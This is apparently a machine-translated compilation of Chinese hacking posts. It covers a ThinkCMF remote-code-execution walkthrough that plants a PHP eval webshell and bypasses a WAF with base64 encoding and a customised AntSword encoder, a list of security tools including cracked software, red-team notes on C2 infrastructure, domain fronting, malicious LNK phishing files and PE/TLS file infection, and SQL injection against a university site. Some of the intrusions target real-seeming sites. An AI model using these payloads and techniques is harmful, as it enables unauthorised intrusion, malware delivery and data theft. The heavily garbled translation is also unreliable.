ThinkCmfはたたたたRCEを持っおいたす。あなたはそれを詊すこずができたす

a=fetchtemplatefile=public/indexprefix='' content=phpfile_put_contents 'test1.php'、 'php @eval$ _ post [zero]'/php 1049983-20220112164552044-677112220.png

癜い画面は良い兆候です、それは成功する必芁がありたす

蚪問

1049983-20220112164552436-718691216.png

Ant Sword Connectionを詊しお、゚ラヌを盎接報告しおください。ファむアりォヌルに遭遇したのかもしれたせん

1049983-20220112164552799-1836727167.png

その埌、戻っおきお、シェルが手動でphpinfoを詊しおみおください

1049983-20220112164553285-397754991.png

案の定、パゎダファむアりォヌルがありたす

0x02パゎダファむアりォヌルをバむパス

パゎダはいく぀かの機胜をフィルタリングする必芁があるため、ペむロヌドを盎接枡すこずは間違いなく䞍可胜であるため、トラフィックを難読化する必芁がありたす。

すべおのペむロヌドBase64゚ンコヌディングを転送しおみおください

コヌド化されたbase64は枡されるため、Xiao MAもそれに応じお倉曎を加える必芁がありたす。合栌したbase64を1回埩号化するだけです。

ポニヌは次のずおりです。

php @evalbase64_decode$ _ post [zero];

cghwaw5mbygpow==ずしおphpinfo; base64を゚ンコヌドしたす

送信

1049983-20220112164553930-1137618434.png

パゎダファむアりォヌルはもう傍受されおおらず、パゎダファむアりォヌルをうたくバむパスしおいるこずがわかりたす。

0x03アリの剣の倉換

Base64゚ンコヌディングを䜿甚しおいたすが、Ant Swordには実際に独自のBase64゚ンコヌディングずデコヌダヌが付属しおいたす。

付属のbase64゚ンコヌダヌを盎接䜿甚しおみおください

1049983-20220112164554625-1682842815.png

なぜこれが起こっおいるのですか

アリの剣からの流れを分析しようずしたす

げっぷにプロキシを蚭定したす

1049983-20220112164555153-1095949143.png

トラフィックを傍受したす

1049983-20220112164555617-1054448656.png

WAFによっお簡単に認識される2぀の堎所が明らかにあるこずがわかりたす。

1぀は次のずおりです。ナヌザヌ゚ヌゞェントヘッダヌのキヌワヌドAntsword/v2.1これは、WAFに私が誰であるかを䌝えるこずに盞圓するため、これが倉曎される最初のポむントです。

第二に、アリの剣のトラフィックには実際にキヌワヌドがありたす。たずえば、CMDパラメヌタヌの埌の評䟡base64_decodeはすべおであり、ポニヌにはbase64埩号化が付属しおいるため、デフォルトの゚ンコヌダヌを䜿甚するず、WAFを通過できないだけでなく、wafがなければポニヌに接続できないため、゚ンコヌダヌを自分で定矩する必芁がありたす。

新しいPHP゚ンコヌダヌを䜜成したす

1049983-20220112164556034-100799155.png

payloadbase64を1回だけ゚ンコヌドする必芁があるため、デヌタの割り圓お['_'] Base64を盎接凊理できたす。ランダムなパラメヌタヌがあるかどうかは関係ありたせん。

゚ンコヌダヌは次のずおりです

「Strictを䜿甚」;

/*

* @param {string} pwd接続パスワヌド

* @param {array}゚ンコヌダヌ凊理前のデヌタペむロヌド配列

* @return {array}デヌタ゚ンコヌダヌによっお凊理されたペむロヌド配列

*/

module.exports=pwd、data、ext={}={

data [pwd]=buffer.fromdata ['_']。toString 'base64';

デヌタを削陀['_'];

デヌタを返す;

}

次に、UAヘッダヌを倉曎したす

1049983-20220112164556453-1074055494.png

゚ンコヌダヌの適甚デコヌダヌはデフォルトで指定する必芁はありたせん

スパムデヌタずマルチパヌトパケットを远加するこずを遞択するこずをお勧めしたす

1049983-20220112164556945-1615615751.png

接続をもう䞀床テストしたす

1049983-20220112164557635-1866671821.png

1049983-20220112164558088-998864945.png

次に、ディレクトリをクリックしお、ただ問題があるこずがわかりたす。ディレクトリを暪断するこずはできたせん。この問題は、実際にはゎゞラによっお解決できたす。ゎゞラ銬をアップロヌドしたす。

誰かがここで尋ねおから、ゎゞラの銬を盎接アップロヌドするだけですか実際の状況は、GETパラメヌタヌ送信に長さの制限があり、䞀郚のシンボルにより、PHPファむルの切り捚おがそのたたアップロヌドできなくなるこずです。

1049983-20220112164558469-1007988296.png

りェブサむトはかなりありたすが、メむンサむトがないこずは残念です。デヌタベヌスには、プロキシアカりントがたくさんありたす。それは時間の無駄です

1049983-20220112164558847-145283342.png

0x03芁玄

1。BCのタヌゲットメむンサむトにアクセスする堎合、搟取可胜な脆匱性はありたせん。サブサむトにアクセスしお管理ディレクトリに入力するこずにより、背景にゞャンプしたす。 2。CMSフィンガヌプリントク゚リを介しお、サブサむトはThinkCMFフレヌムワヌクであるこずがわかりたした。3http://www.xxx.com/a=fetchtemplatefile=public/indexprefix='content=file_put_put_contentsZEL.PHP @evAl [ZEL。アクセスアドレスhttp://www.xxx.com/test1.phpに空癜が衚瀺されたす。 5.アリの剣の接続を詊しお、゚ラヌを盎接報告し、ポストコマンドを実行し、Pagodaファむアりォヌルがhttp://wwwww.xxx.com/test1.phppost:zero=phpinfo(); 6;ここでRCEは、文を曞いおいたす。Base64Encryption3http://www.xxx.com/?a=fetchtemplatefile=public/indexprefix='Content=file_put_put_contents('test2.php','?php @evalbase64_decode$ _ post [zero]7。 phpinfo; base64ずしおcghwaw5mbygpow==ずしおbase64を゚ンコヌドし、http://wwwww.xxx.com/test2.phppost:zero=cghwaw5mbygpow5mbygpow==7 pagoda fir fir fir fir fir fir fir fir fira firewallは、アリの゚ヌゞェントをむンタヌセプトしたす。 CMDパラメヌタヌ。 1぀は、ナヌザヌ゚ヌゞェントヘッダヌのキヌワヌドAntsword/v2.1です。これは、WAFに私が誰であるかを䌝えるこずず同等です。これは、倉曎される最初のポむントです。第二に、アリの剣のトラフィックは実際にはただキヌワヌドです。たずえば、CMDパラメヌタヌの埌の評䟡base64_decodeはすべおであり、私たちの小さな銬にはbase64 Decryption 8が付属しおいたす。

/** @param {string} pwd接続パスワヌド* @param {array} data payload array before encoder processing* @return {array} data payload array andy encoder processing*/module.exports=pwd、data、ext={}={{{{{

data [pwd]=buffer.fromdata ['_']。toString 'base64';

デヌタを削陀['_'];

デヌタを返す;} 9。 Ant Sword user-agentvaule:のリク゚スト情報でUAヘッダヌ名:を通垞のHTTP芁求倀に倉曎したす。ただアクセスしないようにディレクトリをクリックしたす。 12.同じ方法を䜿甚しお、GodzillaのデフォルトのBase64゚ンコヌダヌをロヌドおよび改造したす。これにより、パゎダファむアりォヌルをバむパスしお通垞アクセスできたす。

オリゞナルリンクhttps://xz.aliyun.com/t/9295

HireHackking

スキャンをスキャン

nessusホヌムバヌゞョン

OpenvasKaliにOpenvasをむンストヌルし、吊り゚ヌゞェントに泚意を払っおください。そうしないず、非垞に遅くなり、゚ラヌが報告されたす

AWVSクラックバヌゞョン-52pojie

AppScanクラックバヌゞョン

BurpsuiteProクラックバヌゞョン

MOBSFモバむルアプリクラむアントはiOSをサポヌトしたすが、Macで実行する必芁がありたす

NMAP/ZMAP/MASSCANポヌトスキャン

脆匱性管理

Insight

smef

fuxi

Defectdojo

電気チュヌブ

Jira

犅タオ

srcプラットフォヌム

SRCMS

laravel-src

資産管理/自動操䜜ずメンテナンス

Xunfeng

AssetsView

ブルヌクゞラBK-CMDB

opsmanage

Ansible

゜ルトスタック

soc

SOSRP

W3A_SOC

opensoc

オシム

䟵入怜知/セキュリティ監芖/トラフィックバックトラッキング

SuricataSelks

仲間

Ossecwazuh

セキュリティ玉ねぎ

owlh

Nethserver

錻を鳎らしたす

openwips-ng

モロク

Tongcheng-dragon

CloudWalkerMu YunはWebShell CheckずKillのみを開くだけです

osquery

Webアプリケヌションセキュリティ

NGX_LUA_WAF

OpenStar

modsecurity

OpenWaf

OpenRasp

x-waf

jxwaf

集䞭タヌミナルセキュリティ管理

360゚ンタヌプラむズ゚ディション

芝の安党

芁塞

ゞャンプサヌバヌ

テレポヌト

コヌド品質管理/コヌド監査

゜ナヌ +ゞェキンス

コブラ

VCG

Fortifyひび割れたバヌゞョン、芋぀かった最新のルヌルは2018.3です

RIPS/SEAY゜ヌスコヌド監査システムPHP

FindBugsJava

Webログ監査

360スタヌ画像

xlog

ロルグ

ログ分析システム

゚ルクes+logstash+kibana

Kibana_hanizationKibana Chineseバヌゞョン

オンラむン行動管理/アクセス/認定

Packetfence

むクアむ

openldap

䞭倮認蚌サヌビスCAS

デヌタリヌク防止

opendlp

ベヌスラむン怜査/匷化

cis

リニス監査

Winspect

openscap

githubリヌクスキャン

X-patrol

ホヌクアむ

gsil

vksrc/github-monitor

カタログむンデックスシステム/パヌ゜ナルネットワヌクディスク/ファむル共有

ZDIR

NextCloud

シヌフィルコミュニティ゚ディション

owncloud

オニオンシャレ

Pydio现胞

honeypot

opencanary_web

Tポット

Mhn

釣り

P神のフィッシング

mail_fishing

ブラックキヌ

gophish

APIゲヌトりェむ

GOKU-API-GATEWAY

コング

その他

WebrangeDocker Management Platform

App-Hostむントラネットアプリのリリヌス

アドバックボックス

osquery

php-sso

スカりトURL監芖プラットフォヌム

jxotp2因子認蚌システムぞのsshログむン

Doclever

リニス監査

射手

Walle-Webコヌド展開プラットフォヌム

アポロ構成センタヌ

倉化するオヌプン゜ヌスMuyun CloudwalkerWebShell怜出パヌツのみ

星雲の「星雲」ビゞネスリスク制埡システム

Meituan DBProxyデヌタベヌスファむアりォヌル

Linuxの䞋のrkhunter/chkrootkit

Pchunter/Turf Sword/Powertool/ProcessExplorer/ProcessHacker/Autoruns/OTLを獲埗したす

カスペルスキヌ

FASTIR_COLLECTOR_WINフォレンゞック

FASTIR_COLLECTOR_LINUX FORNSICS

dシヌルドりェブシェルチェックずキル

Sandboxie Personal Sandbox

クラマブ

HireHackking

情報収集ず倖郚ネットワヌク管理

私は遅れお起きたので.私は最初のトピックを聞いおいたせんでした、私は少し埌悔したす、私は写真を远加したす

1gtm3lr4exs7974.png

むンフラストラクチャアヌキテクチャの蚭蚈ず展開

通垞のアヌキテクチャレッドチヌム担圓者- 》チヌムサヌバヌCS-》タヌゲットマシンの欠点分離されおいない機胜、朜圚チャネルなし、接続するために倚くのログが戻り、柔軟性が䜎い

進化アヌキテクチャDNS/HTTP/HTTPS分離サヌバヌのヒント1〜2CPU 2Gメモリ10Gハヌドディスク、5回の再接続、朜圚チャネル実際のタヌゲット環境に基づく優先床

完党なアヌキテクチャドメむン名ずIPVPSTeamServerCSフロント゚ンドマシンRedictorCS-》 TeamServers 1/2/3/.プレレベルレむダヌSMTP/ペむロヌド/C2/隠しC2

ksxz3qquhvc7975.png

ドメむン名を遞択したす

r01bcqdyihe7976.png

expedDomains.net delete domainを登録したす

TIPS1:には、䞖界メヌカヌやりむルス察策メヌカヌに関連するドメむン名、およびタヌゲットに関連するドメむン名は含たれおいたせん。

TIPS2タヌゲット関連領域に共通ドメむン名を登録しおください。プラむバシヌ保護を有効にするこずを忘れないでください

その他www.freshdrop.comwww.domcop.com

TIPS3ドメむン名が分類されおいるかどうかを確認し、財務、医療、eコマヌス、航空、旅行

TIPS4VTずマむクロステップに移動しお、ドメむン名が黒ずしおマヌクされおいるかどうかを確認したす

TIPS5虐埅を報告するためのルヌルを泚意深く読む泚意しお䜿甚する

ドメむン名アカりントの維持を栜培しお通垞のドメむン名を䜜成し、各セキュリティメヌカヌに提出しおサむトを分類したす

TIPS1ドメむン名を倧芏暡な工堎IPに分類し、䜿甚したずきにC2に解析し、䜿甚しおいないずきに倧芏暡な工堎IPに解析したす。

TIPS2VT自己評䟡、アレックスの自己評䟡

ドメむン名の解像床怜出

DomainCheck分類怜出ドメむン名

IPは倖郚ネットワヌクIPを怜出し、むンテリゞェンスステヌションを介しお黒ずしおマヌクされおいるかどうかを確認したす。

CDNを䜿甚しお実際のIPを非衚瀺にしたす䞀郚のセキュリティベンダヌはCDN IPを傍受したす

卵を産むために鶏を借りる、サブドメむンテむクオヌバヌ高衚珟ドメむンの分析a b -》

プレリリヌスのための高繰り返しブロむラヌ

C2ツヌルCS 3.14

カスタムトラフィック特性DNS/HTTP/HTTPS/SMBおよびTCP

ペむロヌド読み蟌みプロセスシェルコヌド/ロヌダヌ/雄匁/ビヌコン

DNSDNSチャネルのデフォルトパラメヌタヌを倉曎する必芁がある堎合デバむスで簡単に怜出できたす、DNSをデヌタチャネルずしお䜿甚しないでください。

HTTPSURIのファむルサフィックスにJS、CSSなどの静的ファむルを蚭定しないでください。効果有料蚌明曞無料蚌明曞自己眲名蚌明曞Let's Encryptは無料で、3か月間期限切れ、自動的に曎新されたす

Redirectordns socat | iptables | sshtmuxず画面のいずれかを遞択

Apache | nginx

ヒント

耇数の刀断を䜿甚しお芁求し、デフォルトのURIの䜿甚を拒吊し、ネットワヌク党䜓でC2スキャンず戊うこずをお勧めしたす。

タヌゲット関連のIPアクセスのみがクラりドサンドボックスず戊うこずができたす

アクセス期間が制限され、特定の期間のペむロヌドのみを芁求する

Googleなどの高衚珟可胜なドメむンに非支払ロヌドURIをリダむレクトしないでください

提案www.aaa.comでドメむン名を䜜成し、c2.aaa.comの第2レベルのドメむン名を䜿甚しおC2を実行したす

ドメむンフロングIPおよびドメむン名を非衚瀺にする方法

Googleアプリ゚ンゞン| Amazon | Azure | Aliyun CDN

可芖局DNS、TLS

目に芋えないレむダヌhttps

URL高い評刀SNI高い評刀ホストC2

https://github.com/vysecurity/domainfrontinglists

代替゜リュヌションHTTPパむプラむンHTTP 1.1

ドメむンフロンティングず同じ効果

同じTCP接続を䜿甚しお、さたざたなホストのHTTPパケットを送信したす

ヒント優れたドメむン +バッドドメむンパッケヌゞ1぀のレむダヌず同時に送信する

サヌドパヌティサヌビスはC2ずしお䜿甚されたす

Office365、Pastebin、Slack、Facebook、Dropbox、Gmail、Twitter。

サヌドパヌティサヌビスにハヌドコヌドする必芁がありたす

メヌルフィッシングSMTPドメむン名同じC2ドメむン名を遞択したす

非垞に評刀の良い電子メヌル送信者MailChimp、SendGrid

SPF、dkim \ dmarcを正しく構成したす

SSL蚌明曞

時間ず頻床を送信したす

ワンクリック展開

フィッシングメヌルフレヌムワヌクgophishhttps://github.com/gophish/gophish

隠蔜ずセキュリティの暩限を最小化するIPTALBESを䜿甚しおコンポヌネント通信を制限し、ポヌト転送のSSH

TeamServerポヌトを制限しおロヌカルアクセスのみを制限し、ビヌコンリスニングポヌトのみリダむレクタヌアクセスを制限したす

ヒントVPSはGFWで簡単に傍受できたすか

解決策V*2r a y + nginx + cloudflare + freenom + websocketセットアップ゚ヌゞェント

むンフラストラクチャ監芖システムは、完党なログを蚘録し、アラヌムを蚭定したす

自動展開luwuhttps://github.com/qax-a-team/luwu

ログセンタヌ

事前emailフィッシング情報の収集ず調査

技術的課題

メヌルゲヌトりェむメヌルゲヌトりェむ

ブラりザ

EDR、IDS

メヌルゲヌトりェむ

スパムアンチスパム

SPF

dkim

新しく登録されたドメむン名

珍しいドメむン名の接尟蟞

機密キヌワヌド

特性

電子メヌルリベヌトはデフォルトで有効になりたす

MTAは、デフォルトでは受信者の怜蚌をオンにしたせん

結論フィッシングメヌルを存圚しないメヌルボックスアカりントに送信するず、NDRを受信できる堎合、フィッシングメヌルが電子メヌルゲヌトりェむセキュリティレビュヌ埌方散乱攻撃に合栌したこずが蚌明されおいたす。

スパムをバむパスしたす

䞊蚘の結論、怜出、ファゞングアンチスパム゚ンゞンルヌル

NDRを安定にトリガヌする方法

10mを超えるテキスト

5,000人以䞊の受信者

アンチマルりェアをバむパスしたす

ndr

芁玄したす

ukww1chch0j7977.png

釣りサンプルの生産

フィッシング電子メヌルタむプの悪意のあるCHMドキュメント簡単に䜿甚したすが、珟圚゜フトを殺すこずは困難であり、殺害を回避する効果は貧匱です

悪意のあるマクロコヌドを䜿甚したオフィスドキュメント混乱しやすいがやけた写真などず組み合わせおが、マクロを手動で開く必芁があり、プロセスチェヌンは疑わしいです

ホワむトプラスブラックフィッシング眲名付きホワむトプログラムを䜿甚しお、DLLハむゞャックスキヌムを介しお悪意のあるDLLをロヌドしたす。 AVに合栌する方が簡単ですが、枛圧および実行する必芁がありたす。

LNKファむルフィッシングリンクオブゞェクトはPowerShell、プロセスチェヌンは完璧です

PPTフィッシングサンプルPPTハむパヌリンク、「安党声明」がポップアップし、マクロを開始する必芁はありたせんが、フルスクリヌンで再生し、実行前に有効にする必芁がありたす。䜿甚するこずはお勧めしたせん

悪甚するフィッシングメヌル高効率ず高コスト

曞き蟌みツヌルは自動的に悪意のあるLNKを生成したす、キヌ関数ishelllink:SeticOnlocation

ishelllink:setshowcmdりィンドりディスプレむ

ishelllink:setarguments

ishelllink:setpath

.

LNKフィッシングの電子メヌルフィッシング履歎曞の執筆コンテンツを遞択しお誇匵するこずができたす。そのため

LNKアむコンの衚瀺各システムにデフォルトで衚瀺できる䞀般的なアむコンに倉曎

動䜜を非衚瀺にする方法setShowcmdりィンドりを最小化したす

Word Documentストレヌゞ

オンラむンで単語文曞をダりンロヌドしおください

new-Object System.net.WebClient.DownLoadFileurl、file_path;

デヌタぱンゞンを埩元したす

プロトコルコンテンツの埩元TCP、HTTP、SMTP

ファむルコンテンツの埩元Office、PDF、ZIP

砲撃プログラムの埩元UPX

暗号化アルゎリズムデヌタ埩元base64

単語文曞をロヌカルにリリヌスしたす

command_line_argumentsに単語を抌したす

匕数は、LNKにコマンドラむンパラメヌタヌを保存するために䜿甚されたす

StringData構造、カりントチャヌゞャヌ

ishelllink:setarguments

詰め蟌たれたデヌタの最倧倀は、コマンドラむンパラメヌタヌの長さの制限です

実際の枬定倀は0x7FC231kbであるこずがわかりたした

LNKファむルの最埌に単語を抌したす掚奚

Word、PE、あらゆるサむズのPowerShellは尟に远加できたす

-last 1を遞択し、最埌のオブゞェクトを配眮し、オブゞェクトを「\ n」ず陀算したす

-index 1を遞択しおください

゜フトキルの察立

短いファむル名のパワヌ〜1.exe

コヌド難読化参照Symantecの論文

セキュリティプロセスの怜出

仮想マシン - 四角のツヌル゜フト゜ルバヌ怜出脱bugger

埓来のテクニック

プロセス名の怜出

りィンドりのタむトル怜出

新しいポヌズ

プロセスを暪断し、プロセスの察応する著䜜暩情報を取埗し、ブラックリストリストず比范したす

利点アップグレヌドされたバヌゞョンも倉曎されおおらず、普遍的です

PIDに基づいおプロセスの完党なパスを取埗する方法ProcessExplorer

x86は実行䞍可胜で、x64は問題ありたせん

Pchunter 0ringフックをバむパスしたす

怜出埌、攻撃者に通知し、䜙波にタむムリヌに察凊したす

むントラネット氎平ムヌブメント

むントラネット調査

叀兞的なアクティブおよびパッシブむントラネット調査方法

アクティブなスキャン

機噚資産の識別

利甚可胜なサヌビスコレクション

スクリプト怜出

パッシブコレクション

ブロヌドキャストメッセヌゞを聞いおください

鉱山譊告

リスク偎ネットワヌクACL封鎖、制埡ホストHIDS、ハニヌポット、NIDS

メ゜ッド比范

ドメむン内情報怜出*クラスドメむン * * nix * Windows広告

ポゞショニングドメむンコントロヌルドメむンホスト

タむムサヌバヌ

正味時間/ドメむン

W32TM /ク゚リ

DNSサヌバヌ

get-dnsclientserveraddressネむティブDNSサヌバヌの蚭定をク゚リしたす

ドメむンの察応するアドレスは、DNSサヌバヌからレコヌドを照䌚したす

ドメむン制埡ロケヌタヌ

DCロケヌタヌプロセス

DNSク゚リを生成し、DCロケヌタヌメカニズムに埓うこずは非垞に安党です

Kerberos認定、KDC

GC

ク゚リツヌル

ドメむン制埡情報を抜出するNLTESTプロセス

ネット

dsquery query ldap

dsquery/adsisearcherはPlantext LDAPプロトコルを䜿甚し、IDSによっお簡単にキャプチャされたす

ポゞショニングドメむンコントロヌル屋倖ホスト

DNSトラブルシュヌティング

UDP/53をスキャンしたす

DNSからDNS FQDNをク゚リしたす

DNSのク゚リロケヌタヌ

ldapsgcs

ポヌトをスキャンし、機胜を䜿甚しおドメむン名をフィルタリングしたす

匿名でLDAPメタデヌタの䞀郚を読みたす

LDAP蚌明曞情報をお読みください

GCサヌビスク゚リTCP/3268 TCP/3269

防埡匿名のバむンディングをオフにするこずができたす

ク゚リLDAPSサヌビス

adexplorergui、いく぀かのcmdlets

Get-Aduser

PowerView倚数のcmdlets

Kerberos

as-req as-rep

KDC TGTチケット

ASプロトコルに基づくナヌザヌの列挙

kerberosuserenuma-team github

MSFモゞュヌル

asReproast

ナヌザヌのnthash暗号化を䜿甚したセッションキヌ

John/Hashcatはオフラむンで割れるこずができたす

SPNサヌビスプリンシパル名ドメむンオブゞェクトのプロパティ、オブゞェクトはマシン/ナヌザヌであり、蚭定する必芁がありたす

TGS-REQ TGS-REP

サヌビスチケット

サヌビスチケット

結論通垞のドメむンアカりントのサヌビスチケットを申請した埌、アカりントをオフラむンでクラックできたす

Kerberoast攻撃䞊蚘の結論に基づく

rubeus.exe

PowerView

ハントドメむン管理者

特定のナヌザヌログむンセッション

リモヌトセッションの列挙

netSessionEnumSMBセッション

Netwkstauserenumむンタラクティブログむンセッションシステムの新しいバヌゞョンには、管理特暩が必芁です

リモヌトナヌザヌの列挙

シナリオ同じ名前の同じドメむン管理アカりントを持぀䞀郚のロヌカルアカりントは、同じ人が䜜成するこずができたす

SAMRク゚リグルヌプずメンバヌ情報泚WIN 10は管理なしでは列挙できたせん

LSARPCク゚リSID関連

リモヌトログむン列挙

むンタラクティブログむン䞻にコン゜ヌルずRDPのログむン方法を指したす

ホスト蚱可を取埗するVUL RBCD RPRN

レガシヌ資栌情報: PowerView Mimikatzを抜出したす

ナヌザヌ蚱可を取埗したす

氎平に移動したす

MS-RPC

WMIDCOM TCP/135ベヌスのプレヌンテキストトランスミッション

PSEXEC ヒントImpacket Tool Psexec.pyを䜿甚したす。違いは、タヌゲットがSMB3.0をサポヌトしおデフォルトで暗号化を有効にするこずです

リモヌトでタスクをスケゞュヌルしたす

DCOMリモヌトでTCP/445 +ランダムポヌトDComexec.pyず呌ばれるCOMコンポヌネント

Kerberosは委蚗されたした

抂念これは、サヌビスがナヌザヌのIDにアクセスしお他のサヌビスにアクセスできるようにする認蚌メカニズムです。

無制限の委任デフォルト蚭定ドメむンコントロヌルのみが無制限の委任できる

S4U2Self

プリンタヌバグプリンタヌスプヌラヌサヌビスSSRF

無制限の委任+ S4U2Self +プリンタヌ任意のドメむンコントロヌル

制玄委任

S4U2Proxy

リ゜ヌスベヌスの代衚団RBCD珟圚最も臎呜的な代衚団

S4U2Self、S4U2Proxyを継承したす

ドメむン暩限メンテナンス

ホスト暩限が維持されおいる䞀般的なタむプ、拡匵されおいない

ドメむン暩限メンテナンス

SPN

アカりントに぀いおは、前のアカりントを参照しおください

ゎヌルデンノヌト

KRBTGTを䜿甚しおTGTを暗号化するず、TGT暗号化はアカりントのキヌをキヌずしお䜿甚したす

デフォルトのパラメヌタヌで䜜成されたゎヌルドチケットは長い間倱効したす、Mimikatz

DCSYNCは、ドメむン内のアカりントのハッシュ/キヌをプルしたす

怜出ポむント

KRBTGTキヌ、KRBTGTパスワヌドを2回倉曎し、4769ログを分析したす

ログ分析

IDSルヌル、有効期限、アルゎリズムなど。

シルバヌノヌト

SRVS関連のキヌ暗号化

怜出ポむント

PAC情報確認

制限された委任

RBCD

ドメむングルヌプポリシヌ

ラップ

ファむル感染ず氎平方向の動き

ファむル感染

意矩

シヌン

同瀟の゜フトりェアラむブラリサプラむチェヌンは「ラむフの駆動」に䌌おいたす

リモヌト共有ファむルに感染したす

USBドラむブやモバむルハヌドドラむブなどの倖郚デバむスの感染

3389ディスクをサヌバヌにマりントしたす

メヌル感染、悪意のあるマクロを挿入したす

トラフィックハむゞャック、茞送䞭のファむルに感染したす

方法

PE感染

LNK感染

オフィス感染

日垞的なPE感染

exeにむンポヌト関数を远加し、dllmainで悪意のあるコヌドを䜜成したす、ツヌルスタゞップ

悪意のあるコヌドをPEに挿入し、OEPを倉曎し、PEを再構築したす

OEPのどこかで悪意のあるコヌドにゞャンプしたす

OEPを倉曎しお、悪意のあるコヌドを指すようにしたす

察立的なアむデア

DLLロヌド

OEPゞャンプ

TLSスレッドロヌカルストレヌゞコヌルバックを䜿甚したす

TLS感染

TLSコヌルバック、抗bug; OEPを倉曎せずに悪意のあるコヌドをTLSに入れたす

TLSデヌタ構造

TLS感染の党䜓的なプロセスセクション間のギャップの怜玢- ディレクトリデヌタディレクトリの倉曎- TLSディレクトリTLSコヌルバック関数の構築-PEの再構築- 悪意のあるファむルのリリヌス

LNKファむル

アむコンを倉曎せずに保぀にはどうすればよいですか

iShelllink:SeticOnLocationは、珟圚のLNKのアむコンにexeを蚭定したす

悪意のあるコヌドは、正垞に元のプログラムを匕き䞊げたす

rundll32.exeで

シナリオ蚱可メンテナンス、氎平方向の動き

オフィスファむル感染

.docx .docmマクロファむルは.docに倉曎できたす

タヌゲットdocxを悪意のあるマクロで.docmたたは.docに倉換したす

゜フトキルの察立

ファむル関連を倉曎したす

.docmは.docに倉曎され、接尟蟞.docmずの戊闘怜出

マクロ関連ファむルを倉曎しお、䟝存関係ファむル名たたはタむプの怜出ず戊う

from:https://github.com/backlion/redteam-bcs

HireHackking

0x00。レッドチヌムの建蚭目暙は、ニュヌス攟送ず軍事゜リュヌションを聎くこずです。軍事解決䞭に、赀ず青の軍隊の間の察立を聞きたす。情報セキュリティ業界では、軍隊ずの類䌌点がありたす。むンタヌネットワヌルドレッドチヌムは攻撃者の偎です。セキュリティ胜力の改善は、セキュリティの脅嚁が発芋される前に、犯眪、防埡、察立の圢にのみ反映されたす。

Red Teamは、さたざたなレベルの安党性でのさたざたなシステムの浞透テストず安党手順に焊点を圓おおいたす。脆匱性を怜出、防止、排陀できたす。 Red Teamは、䌚瀟たたは組織を攻撃する可胜性のある実生掻の攻撃を暡倣し、攻撃者が䜿甚する必芁なすべおの手順を実行したす。攻撃者の圹割を匕き受けるこずにより、圌らは、サむバヌセキュリティに脅嚁を䞎えるバックドアや搟取可胜な脆匱性である可胜性のある組織を瀺しおいたす。

䞀般的な慣行は、レッドチヌムワヌクのために組織倖の人々を雇うこずです。誰かがセキュリティの脆匱性を掻甚するずいう知識を習埗しおいたすが、組織のむンフラストラクチャに組み蟌たれた防埡に気づいおいたせん。

もちろん、゚ンタヌプラむズセキュリティの建蚭の過皋で、圓瀟の䌁業は、基本的な防埡ず怜出機胜があり、この機胜を継続的に怜査および改善する必芁がある堎合にのみ、赀チヌムを構築する必芁がありたす。

0x01。レッドチヌムのスキル1。レッドチヌムの䞻な特城は、箱の倖偎を考えるこずです。䌚瀟の安党をよりよく保護するための新しいツヌルずテクノロゞヌを垞に探しおいたす。赀いチヌムであるこずは、タブヌであるため、ある皋床の反乱を抱えおいたす。ルヌルず正圓性を砎りながら癜い垜子のテクニックに埓い、システムの欠陥を人々に瀺したす。誰もがこれらを奜むわけではありたせん。

2。攻撃されたシステムの詳现な理解は、Redチヌムがすべおのシステムを理解し、技術的な傟向に埓うこずが重芁です。サヌバヌずデヌタベヌスを理解するこずで、脆匱性を芋぀ける方法を芋぀けるためのより倚くのオプションが埗られたす。

3.セキュリティツヌルの自動化機胜独自のツヌルを開発する方法を理解するこずの利点は膚倧です。゜フトりェアを曞くには倚くの緎習ず絶え間ない孊習が必芁であるため、それを䜿甚しお埗られるスキルは、どんなレッドチヌムでも最高の攻撃戊術を実行するのに圹立ちたす。

4.浞透テスト浞透テストは、コンピュヌタヌずネットワヌクシステムに察する攻撃をシミュレヌトし、セキュリティの評䟡に圹立ちたす。脆匱性ず包括的なリスク評䟡を提䟛する朜圚的な脅嚁を特定したす。浞透テストは、Redチヌムの重芁な郚分であり、その「暙準」手順の䞀郚です。たた、癜い垜子でもよく䜿甚されたす。

5.゜ヌシャル゚ンゞニアリングあらゆる組織のセキュリティ監査を実行する堎合、ヒュヌマン゚ラヌはデヌタ䟵害ずリヌクの最も䞀般的な原因の1぀であるため、機密デヌタ䟵害に぀ながる可胜性のある運甚を実行するために人員を操䜜するこずが重芁です。

0x02。レッドチヌムは、盞手を攻撃する前にむンフラストラクチャに䟵入し、独自のむンフラストラクチャを構築する必芁がありたす。党䜓ずしお、最初の郚分、むンテリゞェンスコレクション、2番目の郚分、C2アヌキテクチャの2぀の郚分がありたす。

1.アクティブむンテリゞェンスコレクションタヌゲットドメむン名を収集し、ホストをスキャンし、Webシステムの脆匱性を収集し、

パッシブコレクションShodan、Google、Github、Maltego、その他のむンテリゞェンスを䜿甚しお収集したす。

゜ヌシャルワヌカヌの収集コヌポレヌトメヌル、WeChat、Weiboなどの䌁業埓業員に関する情報。

2。C2アヌキテクチャの簡単な説明C2は、タヌゲットシステムの暩限を取埗した埌、バックドアがシステムを持続するこずを意味したす。斜蚭のこの郚分は、ペむロヌド生成システムず協力する必芁がありたす。

珟圚の䞀般的な方法DNSトンネルずHTTPトンネルによっおアりトリヌチされたC2システム。

omnnqlvp2hl7978.png

C2トラフィックのリダむレクトの背埌にある目的は2぀のものです。緊急察応者が通信むベントを衚瀺する堎合、バック゚ンドチヌムサヌバヌを混乱させるず、正圓なWebサむトのようです。 Apache Mod_rewriteず[カスタムC2構成ファむルを䜿甚するこずにより、調査トラフィックからの実際のC2トラフィックを確実にフィルタリングできたす。

䞊蚘の「C2リダむレクト」に基づいおC2リダむレクトにHTTPSを䜿甚しお、別の方法は、リダむレクトサヌバヌにApacheのSSLプロキシ゚ンゞンを䜿甚しおむンバりンドSSL芁求を受け入れ、それらのリク゚ストをリバヌスHTTPSリスナヌにプロキシにするこずです。暗号化はすべおのフェヌズで䜿甚され、必芁に応じおリダむレクタヌでSSL蚌明曞を回転させるこずができたす。

0x03。 REDチヌムの䟡倀は、定量的䟵入指暙を通じおセキュリティ機胜を改善し、セキュリティ補品チヌムがホストおよびネットワヌクベヌスの䟵入怜知システムの怜出率を改善するのにも圹立ちたす。

from:https://www.4hou.com/penetration/17530.html

HireHackking

0x01はじめに

詊隓の準備をするずき、私は誀っおキャンパスネットワヌクのサむトをクリックしおレビュヌを停止したした剣を描くだけです

1049983-20220106104512280-663778906.png

0x02浞透プロセス

泚射のテスト

http://url/newdetail.aspxid=11999 'たたは1=1-

SQLMAPは盎接䜿甚され、WAF犬の頭はありたせん

1049983-20220106104513053-178884482.png

さりげなく芋おください

